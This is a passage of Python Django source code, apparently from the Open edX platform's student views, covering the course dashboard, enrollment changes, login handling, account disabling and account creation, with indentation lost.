enrollment.course_id for enrollment in course_enrollments
if enrollment.refundable()
)
block_courses = frozenset(
enrollment.course_id for enrollment in course_enrollments
if is_course_blocked(
request,
CourseRegistrationCode.objects.filter(
course_id=enrollment.course_id,
registrationcoderedemption__redeemed_by=request.user
),
enrollment.course_id
)
)
enrolled_courses_either_paid = frozenset(
enrollment.course_id for enrollment in course_enrollments
if enrollment.is_paid_course()
)
# If there are *any* denied reverifications that have not been toggled off,
# we'll display the banner
denied_banner = any(item.display for item in reverifications["denied"])
# Populate the Order History for the side-bar.
order_history_list = order_history(user, course_org_filter=course_org_filter, org_filter_out_set=org_filter_out_set)
# get list of courses having pre-requisites yet to be completed
courses_having_prerequisites = frozenset(
enrollment.course_id for enrollment in course_enrollments
if enrollment.course_overview.pre_requisite_courses
)
courses_requirements_not_met = get_pre_requisite_courses_not_completed(user, courses_having_prerequisites)
if 'notlive' in request.GET:
redirect_message = _("The course you are looking for does not start until {date}.").format(
date=request.GET['notlive']
)
elif 'course_closed' in request.GET:
redirect_message = _("The course you are looking for is closed for enrollment as of {date}.").format(
date=request.GET['course_closed']
)
else:
redirect_message = ''
context = {
'enrollment_message': enrollment_message,
'redirect_message': redirect_message,
'course_enrollments': course_enrollments,
'course_optouts': course_optouts,
'message': message,
'staff_access': staff_access,
'errored_courses': errored_courses,
'show_courseware_links_for': show_courseware_links_for,
'all_course_modes': course_mode_info,
'cert_statuses': cert_statuses,
'credit_statuses': _credit_statuses(user, course_enrollments),
'show_email_settings_for': show_email_settings_for,
'reverifications': reverifications,
'verification_status': verification_status,
'verification_status_by_course': verify_status_by_course,
'verification_msg': verification_msg,
'show_refund_option_for': show_refund_option_for,
'block_courses': block_courses,
'denied_banner': denied_banner,
'billing_email': settings.PAYMENT_SUPPORT_EMAIL,
'user': user,
'logout_url': reverse('logout'),
'platform_name': platform_name,
'enrolled_courses_either_paid': enrolled_courses_either_paid,
'provider_states': [],
'order_history_list': order_history_list,
'courses_requirements_not_met': courses_requirements_not_met,
'nav_hidden': True,
'programs_by_run': programs_by_run,
'show_program_listing': ProgramsApiConfig.current().show_program_listing,
'disable_courseware_js': True,
}
ecommerce_service = EcommerceService()
if ecommerce_service.is_enabled(request.user):
context.update({
'use_ecommerce_payment_flow': True,
'ecommerce_payment_page': ecommerce_service.payment_page_url(),
})
return render_to_response('dashboard.html', context)
def _create_recent_enrollment_message(course_enrollments, course_modes): # pylint: disable=invalid-name
"""
Builds a recent course enrollment message.
Constructs a new message template based on any recent course enrollments
for the student.
Args:
course_enrollments (list[CourseEnrollment]): a list of course enrollments.
course_modes (dict): Mapping of course ID's to course mode dictionaries.
Returns:
A string representing the HTML message output from the message template.
None if there are no recently enrolled courses.
"""
recently_enrolled_courses = _get_recently_enrolled_courses(course_enrollments)
if recently_enrolled_courses:
enroll_messages = [
{
"course_id": enrollment.course_overview.id,
"course_name": enrollment.course_overview.display_name,
"allow_donation": _allow_donation(course_modes, enrollment.course_overview.id, enrollment)
}
for enrollment in recently_enrolled_courses
]
platform_name = configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
return render_to_string(
'enrollment/course_enrollment_message.html',
{'course_enrollment_messages': enroll_messages, 'platform_name': platform_name}
)
def _get_recently_enrolled_courses(course_enrollments):
"""
Given a list of enrollments, filter out all but recent enrollments.
Args:
course_enrollments (list[CourseEnrollment]): A list of course enrollments.
Returns:
list[CourseEnrollment]: A list of recent course enrollments.
"""
seconds = DashboardConfiguration.current().recent_enrollment_time_delta
time_delta = (datetime.datetime.now(UTC) - datetime.timedelta(seconds=seconds))
return [
enrollment for enrollment in course_enrollments
# If the enrollment has no created date, we are explicitly excluding the course
# from the list of recent enrollments.
if enrollment.is_active and enrollment.created > time_delta
]
def _allow_donation(course_modes, course_id, enrollment):
"""Determines if the dashboard will request donations for the given course.
Check if donations are configured for the platform, and if the current course is accepting donations.
Args:
course_modes (dict): Mapping of course ID's to course mode dictionaries.
course_id (str): The unique identifier for the course.
enrollment(CourseEnrollment): The enrollment object in which the user is enrolled
Returns:
True if the course is allowing donations.
"""
if course_id not in course_modes:
flat_unexpired_modes = {
unicode(course_id): [mode for mode in modes]
for course_id, modes in course_modes.iteritems()
}
flat_all_modes = {
unicode(course_id): [mode.slug for mode in modes]
for course_id, modes in CourseMode.all_modes_for_courses([course_id]).iteritems()
}
log.error(
u'Can not find `%s` in course modes.`%s`. All modes: `%s`',
course_id,
flat_unexpired_modes,
flat_all_modes
)
donations_enabled = DonationConfiguration.current().enabled
return (
donations_enabled and
enrollment.mode in course_modes[course_id] and
course_modes[course_id][enrollment.mode].min_price == 0
)
def _update_email_opt_in(request, org):
"""Helper function used to hit the profile API if email opt-in is enabled."""
email_opt_in = request.POST.get('email_opt_in')
if email_opt_in is not None:
email_opt_in_boolean = email_opt_in == 'true'
preferences_api.update_email_opt_in(request.user, org, email_opt_in_boolean)
def _credit_statuses(user, course_enrollments):
"""
Retrieve the status for credit courses.
A credit course is a course for which a user can purchased
college credit. The current flow is:
1. User becomes eligible for credit (submits verifications, passes the course, etc.)
2. User purchases credit from a particular credit provider.
3. User requests credit from the provider, usually creating an account on the provider's site.
4. The credit provider notifies us whether the user's request for credit has been accepted or rejected.
The dashboard is responsible for communicating the user's state in this flow.
Arguments:
user (User): The currently logged-in user.
course_enrollments (list[CourseEnrollment]): List of enrollments for the
user.
Returns: dict
The returned dictionary has keys that are `CourseKey`s and values that
are dictionaries with:
* eligible (bool): True if the user is eligible for credit in this course.
* deadline (datetime): The deadline for purchasing and requesting credit for this course.
* purchased (bool): Whether the user has purchased credit for this course.
* provider_name (string): The display name of the credit provider.
* provider_status_url (string): A URL the user can visit to check on their credit request status.
* request_status (string): Either "pending", "approved", or "rejected"
* error (bool): If true, an unexpected error occurred when retrieving the credit status,
so the user should contact the support team.
Example:
>>> _credit_statuses(user, course_enrollments)
{
CourseKey.from_string("edX/DemoX/Demo_Course"): {
"course_key": "edX/DemoX/Demo_Course",
"eligible": True,
"deadline": 2015-11-23 00:00:00 UTC,
"purchased": True,
"provider_name": "Hogwarts",
"provider_status_url": "http://example.com/status",
"request_status": "pending",
"error": False
}
}
"""
from openedx.core.djangoapps.credit import api as credit_api
# Feature flag off
if not settings.FEATURES.get("ENABLE_CREDIT_ELIGIBILITY"):
return {}
request_status_by_course = {
request["course_key"]: request["status"]
for request in credit_api.get_credit_requests_for_user(user.username)
}
credit_enrollments = {
enrollment.course_id: enrollment
for enrollment in course_enrollments
if enrollment.mode == "credit"
}
# When a user purchases credit in a course, the user's enrollment
# mode is set to "credit" and an enrollment attribute is set
# with the ID of the credit provider. We retrieve *all* such attributes
# here to minimize the number of database queries.
purchased_credit_providers = {
attribute.enrollment.course_id: attribute.value
for attribute in CourseEnrollmentAttribute.objects.filter(
namespace="credit",
name="provider_id",
enrollment__in=credit_enrollments.values()
).select_related("enrollment")
}
provider_info_by_id = {
provider["id"]: provider
for provider in credit_api.get_credit_providers()
}
statuses = {}
for eligibility in credit_api.get_eligibilities_for_user(user.username):
course_key = CourseKey.from_string(unicode(eligibility["course_key"]))
providers_names = get_credit_provider_display_names(course_key)
status = {
"course_key": unicode(course_key),
"eligible": True,
"deadline": eligibility["deadline"],
"purchased": course_key in credit_enrollments,
"provider_name": make_providers_strings(providers_names),
"provider_status_url": None,
"provider_id": None,
"request_status": request_status_by_course.get(course_key),
"error": False,
}
# If the user has purchased credit, then include information about the credit
# provider from which the user purchased credit.
# We retrieve the provider's ID from the an "enrollment attribute" set on the user's
# enrollment when the user's order for credit is fulfilled by the E-Commerce service.
if status["purchased"]:
provider_id = purchased_credit_providers.get(course_key)
if provider_id is None:
status["error"] = True
log.error(
u"Could not find credit provider associated with credit enrollment "
u"for user %s in course %s. The user will not be able to see his or her "
u"credit request status on the student dashboard. This attribute should "
u"have been set when the user purchased credit in the course.",
user.id, course_key
)
else:
provider_info = provider_info_by_id.get(provider_id, {})
status["provider_name"] = provider_info.get("display_name")
status["provider_status_url"] = provider_info.get("status_url")
status["provider_id"] = provider_id
statuses[course_key] = status
return statuses
@transaction.non_atomic_requests
@require_POST
@outer_atomic(read_committed=True)
def change_enrollment(request, check_access=True):
"""
Modify the enrollment status for the logged-in user.
The request parameter must be a POST request (other methods return 405)
that specifies course_id and enrollment_action parameters. If course_id or
enrollment_action is not specified, if course_id is not valid, if
enrollment_action is something other than "enroll" or "unenroll", if
enrollment_action is "enroll" and enrollment is closed for the course, or
if enrollment_action is "unenroll" and the user is not enrolled in the
course, a 400 error will be returned. If the user is not logged in, 403
will be returned; it is important that only this case return 403 so the
front end can redirect the user to a registration or login page when this
happens. This function should only be called from an AJAX request, so
the error messages in the responses should never actually be user-visible.
Args:
request (`Request`): The Django request object
Keyword Args:
check_access (boolean): If True, we check that an accessible course actually
exists for the given course_key before we enroll the student.
The default is set to False to avoid breaking legacy code or
code with non-standard flows (ex. beta tester invitations), but
for any standard enrollment flow you probably want this to be True.
Returns:
Response
"""
# Get the user
user = request.user
# Ensure the user is authenticated
if not user.is_authenticated():
return HttpResponseForbidden()
# Ensure we received a course_id
action = request.POST.get("enrollment_action")
if 'course_id' not in request.POST:
return HttpResponseBadRequest(_("Course id not specified"))
try:
course_id = SlashSeparatedCourseKey.from_deprecated_string(request.POST.get("course_id"))
except InvalidKeyError:
log.warning(
u"User %s tried to %s with invalid course id: %s",
user.username,
action,
request.POST.get("course_id"),
)
return HttpResponseBadRequest(_("Invalid course id"))
if action == "enroll":
# Make sure the course exists
# We don't do this check on unenroll, or a bad course id can't be unenrolled from
if not modulestore().has_course(course_id):
log.warning(
u"User %s tried to enroll in non-existent course %s",
user.username,
course_id
)
return HttpResponseBadRequest(_("Course id is invalid"))
# Record the user's email opt-in preference
if settings.FEATURES.get('ENABLE_MKTG_EMAIL_OPT_IN'):
_update_email_opt_in(request, course_id.org)
available_modes = CourseMode.modes_for_course_dict(course_id)
# Check whether the user is blocked from enrolling in this course
# This can occur if the user's IP is on a global blacklist
# or if the user is enrolling in a country in which the course
# is not available.
redirect_url = embargo_api.redirect_if_blocked(
course_id, user=user, ip_address=get_ip(request),
url=request.path
)
if redirect_url:
return HttpResponse(redirect_url)
# Check that auto enrollment is allowed for this course
# (= the course is NOT behind a paywall)
if CourseMode.can_auto_enroll(course_id):
# Enroll the user using the default mode (audit)
# We're assuming that users of the course enrollment table
# will NOT try to look up the course enrollment model
# by its slug. If they do, it's possible (based on the state of the database)
# for no such model to exist, even though we've set the enrollment type
# to "audit".
try:
enroll_mode = CourseMode.auto_enroll_mode(course_id, available_modes)
if enroll_mode:
enrollment = CourseEnrollment.enroll(user, course_id, check_access=check_access, mode=enroll_mode)
enrollment.send_signal(EnrollStatusChange.enroll)
except Exception: # pylint: disable=broad-except
return HttpResponseBadRequest(_("Could not enroll"))
# If we have more than one course mode or professional ed is enabled,
# then send the user to the choose your track page.
# (In the case of no-id-professional/professional ed, this will redirect to a page that
# funnels users directly into the verification / payment flow)
if CourseMode.has_verified_mode(available_modes) or CourseMode.has_professional_mode(available_modes):
return HttpResponse(
reverse("course_modes_choose", kwargs={'course_id': unicode(course_id)})
)
# Otherwise, there is only one mode available (the default)
return HttpResponse()
elif action == "unenroll":
enrollment = CourseEnrollment.get_enrollment(user, course_id)
if not enrollment:
return HttpResponseBadRequest(_("You are not enrolled in this course"))
certificate_info = cert_info(user, enrollment.course_overview, enrollment.mode)
if certificate_info.get('status') in DISABLE_UNENROLL_CERT_STATES:
return HttpResponseBadRequest(_("Your certificate prevents you from unenrolling from this course"))
CourseEnrollment.unenroll(user, course_id)
return HttpResponse()
else:
return HttpResponseBadRequest(_("Enrollment action is invalid"))
# Need different levels of logging
@ensure_csrf_cookie
def login_user(request, error=""): # pylint: disable=too-many-statements,unused-argument
"""AJAX request to log in the user."""
backend_name = None
email = None
password = None
redirect_url = None
response = None
running_pipeline = None
third_party_auth_requested = third_party_auth.is_enabled() and pipeline.running(request)
third_party_auth_successful = False
trumped_by_first_party_auth = bool(request.POST.get('email')) or bool(request.POST.get('password'))
user = None
platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)
if third_party_auth_requested and not trumped_by_first_party_auth:
# The user has already authenticated via third-party auth and has not
# asked to do first party auth by supplying a username or password. We
# now want to put them through the same logging and cookie calculation
# logic as with first-party auth.
running_pipeline = pipeline.get(request)
username = running_pipeline['kwargs'].get('username')
backend_name = running_pipeline['backend']
third_party_uid = running_pipeline['kwargs']['uid']
requested_provider = provider.Registry.get_from_pipeline(running_pipeline)
try:
user = pipeline.get_authenticated_user(requested_provider, username, third_party_uid)
third_party_auth_successful = True
except User.DoesNotExist:
AUDIT_LOG.warning(
u"Login failed - user with username {username} has no social auth "
"with backend_name {backend_name}".format(
username=username, backend_name=backend_name)
)
message = _(
"You've successfully logged into your {provider_name} account, "
"but this account isn't linked with an {platform_name} account yet."
).format(
platform_name=platform_name,
provider_name=requested_provider.name,
)
message += "<br/><br/>"
message += _(
"Use your {platform_name} username and password to log into {platform_name} below, "
"and then link your {platform_name} account with {provider_name} from your dashboard."
).format(
platform_name=platform_name,
provider_name=requested_provider.name,
)
message += "<br/><br/>"
message += _(
"If you don't have an {platform_name} account yet, "
"click <strong>Register</strong> at the top of the page."
).format(
platform_name=platform_name
)
return HttpResponse(message, content_type="text/plain", status=403)
else:
if 'email' not in request.POST or 'password' not in request.POST:
return JsonResponse({
"success": False,
# TODO: User error message
"value": _('There was an error receiving your login information. Please email us.'),
}) # TODO: this should be status code 400
email = request.POST['email']
password = request.POST['password']
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
AUDIT_LOG.warning(u"Login failed - Unknown user email")
else:
AUDIT_LOG.warning(u"Login failed - Unknown user email: {0}".format(email))
# check if the user has a linked shibboleth account, if so, redirect the user to shib-login
# This behavior is pretty much like what gmail does for shibboleth. Try entering some @stanford.edu
# address into the Gmail login.
if settings.FEATURES.get('AUTH_USE_SHIB') and user:
try:
eamap = ExternalAuthMap.objects.get(user=user)
if eamap.external_domain.startswith(external_auth.views.SHIBBOLETH_DOMAIN_PREFIX):
return JsonResponse({
"success": False,
"redirect": reverse('shib-login'),
}) # TODO: this should be status code 301 # pylint: disable=fixme
except ExternalAuthMap.DoesNotExist:
# This is actually the common case, logging in user without external linked login
AUDIT_LOG.info(u"User %s w/o external auth attempting login", user)
# see if account has been locked out due to excessive login failures
user_found_by_email_lookup = user
if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
if LoginFailures.is_user_locked_out(user_found_by_email_lookup):
lockout_message = _('This account has been temporarily locked due '
'to excessive login failures. Try again later.')
return JsonResponse({
"success": False,
"value": lockout_message,
}) # TODO: this should be status code 429 # pylint: disable=fixme
# see if the user must reset his/her password due to any policy settings
if user_found_by_email_lookup and PasswordHistory.should_user_reset_password_now(user_found_by_email_lookup):
return JsonResponse({
"success": False,
"value": _('Your password has expired due to password policy on this account. You must '
'reset your password before you can log in again. Please click the '
'"Forgot Password" link on this page to reset your password before logging in again.'),
}) # TODO: this should be status code 403 # pylint: disable=fixme
# if the user doesn't exist, we want to set the username to an invalid
# username so that authentication is guaranteed to fail and we can take
# advantage of the ratelimited backend
username = user.username if user else ""
if not third_party_auth_successful:
try:
user = authenticate(username=username, password=password, request=request)
# this occurs when there are too many attempts from the same IP address
except RateLimitException:
return JsonResponse({
"success": False,
"value": _('Too many failed login attempts. Try again later.'),
}) # TODO: this should be status code 429 # pylint: disable=fixme
if user is None:
# tick the failed login counters if the user exists in the database
if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
LoginFailures.increment_lockout_counter(user_found_by_email_lookup)
# if we didn't find this username earlier, the account for this email
# doesn't exist, and doesn't have a corresponding password
if username != "":
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
loggable_id = user_found_by_email_lookup.id if user_found_by_email_lookup else "<unknown>"
AUDIT_LOG.warning(u"Login failed - password for user.id: {0} is invalid".format(loggable_id))
else:
AUDIT_LOG.warning(u"Login failed - password for {0} is invalid".format(email))
return JsonResponse({
"success": False,
"value": _('Email or password is incorrect.'),
}) # TODO: this should be status code 400 # pylint: disable=fixme
# successful login, clear failed login attempts counters, if applicable
if LoginFailures.is_feature_enabled():
LoginFailures.clear_lockout_counter(user)
# Track the user's sign in
if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
tracking_context = tracker.get_tracker().resolve_context()
analytics.identify(
user.id,
{
'email': email,
'username': username
},
{
# Disable MailChimp because we don't want to update the user's email
# and username in MailChimp on every page load. We only need to capture
# this data on registration/activation.
'MailChimp': False
}
)
analytics.track(
user.id,
"edx.bi.user.account.authenticated",
{
'category': "conversion",
'label': request.POST.get('course_id'),
'provider': None
},
context={
'ip': tracking_context.get('ip'),
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
)
if user is not None and user.is_active:
try:
# We do not log here, because we have a handler registered
# to perform logging on successful logins.
login(request, user)
if request.POST.get('remember') == 'true':
request.session.set_expiry(604800)
log.debug("Setting user session to never expire")
else:
request.session.set_expiry(0)
except Exception as exc: # pylint: disable=broad-except
AUDIT_LOG.critical("Login failed - Could not create session. Is memcached running?")
log.critical("Login failed - Could not create session. Is memcached running?")
log.exception(exc)
raise
redirect_url = None # The AJAX method calling should know the default destination upon success
if third_party_auth_successful:
redirect_url = pipeline.get_complete_url(backend_name)
response = JsonResponse({
"success": True,
"redirect_url": redirect_url,
})
# Ensure that the external marketing site can
# detect that the user is logged in.
return set_logged_in_cookies(request, response, user)
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
AUDIT_LOG.warning(u"Login failed - Account not active for user.id: {0}, resending activation".format(user.id))
else:
AUDIT_LOG.warning(u"Login failed - Account not active for user {0}, resending activation".format(username))
reactivation_email_for_user(user)
not_activated_msg = _("Before you sign in, you need to activate your account. We have sent you an "
"email message with instructions for activating your account.")
return JsonResponse({
"success": False,
"value": not_activated_msg,
}) # TODO: this should be status code 400 # pylint: disable=fixme
@csrf_exempt
@require_POST
@social_utils.strategy("social:complete")
def login_oauth_token(request, backend):
"""
Authenticate the client using an OAuth access token by using the token to
retrieve information from a third party and matching that information to an
existing user.
"""
warnings.warn("Please use AccessTokenExchangeView instead.", DeprecationWarning)
backend = request.backend
if isinstance(backend, social_oauth.BaseOAuth1) or isinstance(backend, social_oauth.BaseOAuth2):
if "access_token" in request.POST:
# Tell third party auth pipeline that this is an API call
request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_LOGIN_API
user = None
try:
user = backend.do_auth(request.POST["access_token"])
except (HTTPError, AuthException):
pass
# do_auth can return a non-User object if it fails
if user and isinstance(user, User):
login(request, user)
return JsonResponse(status=204)
else:
# Ensure user does not re-enter the pipeline
request.social_strategy.clean_partial_pipeline()
return JsonResponse({"error": "invalid_token"}, status=401)
else:
return JsonResponse({"error": "invalid_request"}, status=400)
raise Http404
@require_GET
@login_required
@ensure_csrf_cookie
def manage_user_standing(request):
"""
Renders the view used to manage user standing. Also displays a table
of user accounts that have been disabled and who disabled them.
"""
if not request.user.is_staff:
raise Http404
all_disabled_accounts = UserStanding.objects.filter(
account_status=UserStanding.ACCOUNT_DISABLED
)
all_disabled_users = [standing.user for standing in all_disabled_accounts]
headers = ['username', 'account_changed_by']
rows = []
for user in all_disabled_users:
row = [user.username, user.standing.changed_by]
rows.append(row)
context = {'headers': headers, 'rows': rows}
return render_to_response("manage_user_standing.html", context)
@require_POST
@login_required
@ensure_csrf_cookie
def disable_account_ajax(request):
"""
Ajax call to change user standing. Endpoint of the form
in manage_user_standing.html
"""
if not request.user.is_staff:
raise Http404
username = request.POST.get('username')
context = {}
if username is None or username.strip() == '':
context['message'] = _('Please enter a username')
return JsonResponse(context, status=400)
account_action = request.POST.get('account_action')
if account_action is None:
context['message'] = _('Please choose an option')
return JsonResponse(context, status=400)
username = username.strip()
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
context['message'] = _("User with username {} does not exist").format(username)
return JsonResponse(context, status=400)
else:
user_account, _success = UserStanding.objects.get_or_create(
user=user, defaults={'changed_by': request.user},
)
if account_action == 'disable':
user_account.account_status = UserStanding.ACCOUNT_DISABLED
context['message'] = _("Successfully disabled {}'s account").format(username)
log.info(u"%s disabled %s's account", request.user, username)
elif account_action == 'reenable':
user_account.account_status = UserStanding.ACCOUNT_ENABLED
context['message'] = _("Successfully reenabled {}'s account").format(username)
log.info(u"%s reenabled %s's account", request.user, username)
else:
context['message'] = _("Unexpected account status")
return JsonResponse(context, status=400)
user_account.changed_by = request.user
user_account.standing_last_changed_at = datetime.datetime.now(UTC)
user_account.save()
return JsonResponse(context)
@login_required
@ensure_csrf_cookie
def change_setting(request):
"""JSON call to change a profile setting: Right now, location"""
# TODO (vshnayder): location is no longer used
u_prof = UserProfile.objects.get(user=request.user) # request.user.profile_cache
if 'location' in request.POST:
u_prof.location = request.POST['location']
u_prof.save()
return JsonResponse({
"success": True,
"location": u_prof.location,
})
class AccountValidationError(Exception):
def __init__(self, message, field):
super(AccountValidationError, self).__init__(message)
self.field = field
@receiver(post_save, sender=User)
def user_signup_handler(sender, **kwargs): # pylint: disable=unused-argument
"""
handler that saves the user Signup Source
when the user is created
"""
if 'created' in kwargs and kwargs['created']:
site = configuration_helpers.get_value('SITE_NAME')
if site:
user_signup_source = UserSignupSource(user=kwargs['instance'], site=site)
user_signup_source.save()
log.info(u'user {} originated from a white labeled "Microsite"'.format(kwargs['instance'].id))
def _do_create_account(form, custom_form=None):
"""
Given cleaned post variables, create the User and UserProfile objects, as well as the
registration for this user.
Returns a tuple (User, UserProfile, Registration).
Note: this function is also used for creating test users.
"""
errors = {}
errors.update(form.errors)
if custom_form:
errors.update(custom_form.errors)
if errors:
raise ValidationError(errors)
user = User(
username=form.cleaned_data["username"],
email=form.cleaned_data["email"],
is_active=False
)
user.set_password(form.cleaned_data["password"])
registration = Registration()
# TODO: Rearrange so that if part of the process fails, the whole process fails.
# Right now, we can have e.g. no registration e-mail sent out and a zombie account
try:
with transaction.atomic():
user.save()
if custom_form:
custom_model = custom_form.save(commit=False)
custom_model.user = user
custom_model.save()
except IntegrityError:
# Figure out the cause of the integrity error
if len(User.objects.filter(username=user.username)) > 0:
raise AccountValidationError(
_("An account with the Public Username '{username}' already exists.").format(username=user.username),
field="username"
)
elif len(User.objects.filter(email=user.email)) > 0:
raise AccountValidationError(
_("An account with the Email '{email}' already exists.").format(email=user.email),
field="email"
)
else:
raise
# add this account creation to password history
# NOTE, this will be a NOP unless the feature has been turned on in configuration
password_history_entry = PasswordHistory()
password_history_entry.create(user)
registration.register(user)
profile_fields = [
"name", "level_of_education", "gender", "mailing_address", "city", "country", "goals",
"year_of_birth"
]
profile = UserProfile(
user=user,
**{key: form.cleaned_data.get(key) for key in profile_fields}
)
extended_profile = form.cleaned_extended_profile
if extended_profile:
profile.meta = json.dumps(extended_profile)
try:
profile.save()
except Exception: # pylint: disable=broad-except
log.exception("UserProfile creation failed for user {id}.".format(id=user.id))
raise
return (user, profile, registration)
def create_account_with_params(request, params):
"""
Given a request and a dict of parameters (which may or may not have come
from the request), create an account for the requesting user, including
creating a comments service user object and sending an activation email.
This also takes external/third-party auth into account, updates that as
necessary, and authenticates the user for the request's session.
Does not return anything.
Raises AccountValidationError if an account with the username or email
specified by params already exists, or ValidationError if any of the given
parameters is invalid for any other reason.
Issues with this code:
* It is not transactional. If there is a failure part-way, an incomplete
account will be created and left in the database.
* Third-party auth passwords are not verified. There is a comment that
they are unused, but it would be helpful to have a sanity check that
they are sane.
* It is over 300 lines long (!) and includes disprate functionality, from
registration e-mails to all sorts of other things. It should be broken
up into semantically meaningful functions.
* The user-facing text is rather unfriendly (e.g. "Username must be a
minimum of two characters long" rather than "Please use a username of
at least two characters").
"""
# Copy params so we can modify it; we can't just do dict(params) because if
# params is request.POST, that results in a dict containing lists of values
params = dict(params.items())
# allow to define custom set of required/optional/hidden fields via configuration
extra_fields = configuration_helpers.get_value(
'REGISTRATION_EXTRA_FIELDS',
getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
)
# Boolean of whether a 3rd party auth provider and credentials were provided in
# the API so the newly created account can link with the 3rd party account.
#
# Note: this is orthogonal to the 3rd party authentication pipeline that occurs
# when the account is created via the browser and redirect URLs.
should_link_with_social_auth = third_party_auth.is_enabled() and 'provider' in params
if should_link_with_social_auth or (third_party_auth.is_enabled() and pipeline.running(request)):
params["password"] = pipeline.make_random_password()
# if doing signup for an external authorization, then get email, password, name from the eamap
# don't use the ones from the form, since the user could have hacked those
# unless originally we didn't get a valid email or name from the external auth
# TODO: We do not check whether these values meet all necessary criteria, such as email length
do_external_auth = 'ExternalAuthMap' in request.session
if do_external_auth:
eamap = request.session['ExternalAuthMap']
try:
validate_email(eamap.external_email)
params["email"] = eamap.external_email
except ValidationError:
pass
if eamap.external_name.strip() != '':
params["name"] = eamap.external_name
params["password"] = eamap.internal_password
log.debug(u'In create_account with external_auth: user = %s, email=%s', params["name"], params["email"])
extended_profile_fields = configuration_helpers.get_value('extended_profile_fields', [])
enforce_password_policy = (
settings.FEATURES.get("ENFORCE_PASSWORD_POLICY", False) and
not do_external_auth
)
# Can't have terms of service for certain SHIB users, like at Stanford
registration_fields = getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
tos_required = (
registration_fields.get('terms_of_service') != 'hidden' or
registration_fields.get('honor_code') != 'hidden'
) and (
not settings.FEATURES.get("AUTH_USE_SHIB") or
not settings.FEATURES.get("SHIB_DISABLE_TOS") or
not do_external_auth or
not eamap.external_domain.startswith(
external_auth.views.SHIBBOLETH_DOMAIN_PREFIX
)
)
form = AccountCreationForm(
data=params,
extra_fields=extra_fields,
extended_profile_fields=extended_profile_fields,
enforce_username_neq_password=True,
enforce_password_policy=enforce_password_policy,
tos_required=tos_required,
)
custom_form = get_registration_extension_form(data=params)
# Perform operations within a transaction that are critical to account creation
with transaction.atomic():
# first, create the account
(user, profile, registration) = _do_create_account(form, custom_form)
# next, link the account with social auth, if provided via the API.
# (If the user is using the normal register page, the social auth pipeline does the linking, not this code)
if should_link_with_social_auth:
backend_name = params['provider']
request.social_strategy = social_utils.load_strategy(request)
redirect_uri = reverse('social:complete', args=(backend_name, ))
request.backend = social_utils.load_backend(request.social_strategy, backend_name, redirect_uri)
social_access_token = params.get('access_token')
if not social_access_token:
raise ValidationError({
'access_token': [
_("An access_token is required when passing value ({}) for provider.").format(
params['provider']
)
]
})
request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_REGISTER_API
pipeline_user = None
error_message = ""
try:
pipeline_user = request.backend.do_auth(social_access_token, user=user)
except AuthAlreadyAssociated:
error_message = _("The provided access_token is already associated with another user.")
except (HTTPError, AuthException):
error_message = _("The provided access_token is not valid.")
if not pipeline_user or not isinstance(pipeline_user, User):
# Ensure user does not re-enter the pipeline
request.social_strategy.clean_partial_pipeline()
raise ValidationError({'access_token': [error_message]})
# Perform operations that are non-critical parts of account creation
preferences_api.set_user_preference(user, LANGUAGE_KEY, get_language())
if settings.FEATURES.get('ENABLE_DISCUSSION_EMAIL_DIGEST'):
try:
enable_notifications(user)
except Exception: # pylint: disable=broad-except
log.exception("Enable discussion notifications failed for user {id}.".format(id=user.id))
dog_stats_api.increment("common.student.account_created")
# If the user is registering via 3rd party auth, track which provider they use
third_party_provider = None
running_pipeline = None
if third_party_auth.is_enabled() and pipeline.running(request):
running_pipeline = pipeline.get(request)
third_party_provider = provider.Registry.get_from_pipeline(running_pipeline)
# Track the user's registration
if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
tracking_context = tracker.get_tracker().resolve_context()
identity_args = [
user.id, # pylint: disable=no-member
{
'email': user.email,
'username': user.username,
'name': profile.name,
# Mailchimp requires the age & yearOfBirth to be integers, we send a sane integer default if falsey.
'age': profile.age or -1,
'yearOfBirth': profile.year_of_birth or datetime.datetime.now(UTC).year,
'education': profile.level_of_education_display,
'address': profile.mailing_address,
'gender': profile.gender_display,
'country': unicode(profile.country),
}
]
if hasattr(settings, 'MAILCHIMP_NEW_USER_LIST_ID'):
identity_args.append({
"MailChimp": {
"listId": settings.MAILCHIMP_NEW_USER_LIST_ID
}
})
analytics.identify(*identity_args)
analytics.track(
user.id,
"edx.bi.user.account.registered",
{
'category': 'conversion',
'label': params.get('course_id'),
'provider': third_party_provider.name if third_party_provider else None
},
context={
'ip': tracking_context.get('ip'),
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
)
# Announce registration
REGISTER_USER.send(sender=None, user=user, profile=profile)
create_comments_service_user(user)
# Don't send email if we are:
#
# 1. Doing load testing.
# 2. Random user generation for other forms of testing.
# 3. External auth bypassing activation.
# 4. Have the platform configured to not require e-mail activation.
# 5. Registering a new user using a trusted third party provider (with skip_email_verification=True)
#
# Note that this feature is only tested as a flag set one way or
# the other for *new* systems. we need to be careful about
# changing settings on a running system to make sure no users are
# left in an inconsistent state (or doing a migration if they are).
send_email = (
not settings.FEATURES.get('SKIP_EMAIL_VALIDATION', None) and
not settings.FEATURES.get('AUTOMATIC_AUTH_FOR_TESTING') and
not (do_external_auth and settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH')) and
not (
third_party_provider and third_party_provider.skip_email_verification and
user.email == running_pipeline['kwargs'].get('details', {}).get('email')
)
)
if send_email:
context = {
'name': profile.name,
'key': registration.activation_key,
}
# composes activation email
subject = render_to_string('emails/activation_email_subject.txt', context)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
message = render_to_string('emails/activation_email.txt', context)
from_address = configuration_helpers.get_value(
'email_from_address',
settings.DEFAULT_FROM_EMAIL
)
